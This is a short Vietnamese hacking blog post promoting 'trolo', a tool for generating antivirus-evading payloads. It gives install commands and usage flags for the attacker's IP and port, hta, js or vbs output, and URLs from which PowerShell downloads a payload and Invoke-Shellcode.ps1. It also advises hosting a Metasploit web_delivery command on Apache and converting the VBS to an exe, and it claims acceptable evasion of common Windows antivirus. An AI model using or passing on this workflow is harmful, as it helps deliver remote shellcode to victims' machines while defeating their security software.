Công cụ Hacking

trolo – Tool hỗ trợ ByPass Antivirus đễ dàng

Tác giả: Viết bởi b3rito tại mes3hacklab

Yêu Cầu hệ thống: Đã cài đặt Metasploit Framework hoặc PowerSploit

Nếu hệ thống chưa cài đặt Metasploit Framework bạn có thể tham khảo Video cài đặt Metasploit Framework của admin Nguyễn Anh Kiệt tại đây

https://www.youtube.com/watch?v=4wYb9dE56XI

Hướng dẫn cài đặt

B1: Clone Tool từ GitHub:  git clone https://github.com/b3rito/trolo

B2: Tiến hành cấp quyền và cài đặt nó

cd trolo

chmod +x trolo.sh

sudo ./trolo.sh

Hướng dẫn sử dụng

Tổng quát: ./trolo.sh -i [IP] -p [PORT] -n [TÊN FILE OUTPUT] -f [FORMAT] -a [KIẾN TRÚC – ARCH]

  • -i : Địa chỉ IP máy Hacker
  • -p : Port Hacker muốn sử dụng
  • -n : Tên file xuất ra (Mặc định: PAYLOAD)
  • -a : Kiến trúc: x86 (32bit0 hoặc x64 (64bit)
  • -f : Định dạng xuất ra: hta, js, vbs, tùy chọn
  • -g : Điền Full URL để Powershell lấy file txt xuống. VD: http://IP của bạn/abc.txt
  • -q : Nhập UR L để Powershell lấy file Invoke-Shellcode.ps1 từ đó
  • -u : Cập nhật Tool

Các bạn có thể sử dụng module web_deleverly của Meatasploit để tạo ra câu lệnh powershell để cho nó vào file .txt. Sau đó bạn có thể cho nó vào thư mục của apache2 (/var/www/html) để thực thi dễ dàng

Sau đó các bạn có thể sử dụng 1 vài tool nhỏ để chuyển fie VBS thành file exe

Khi đem đi test thì với các AV phổ biến cho các máy tính Windows ở VN. Thì mức độ bypass Antivirus tôi cho là tạm chấp nhận được

Views: 1553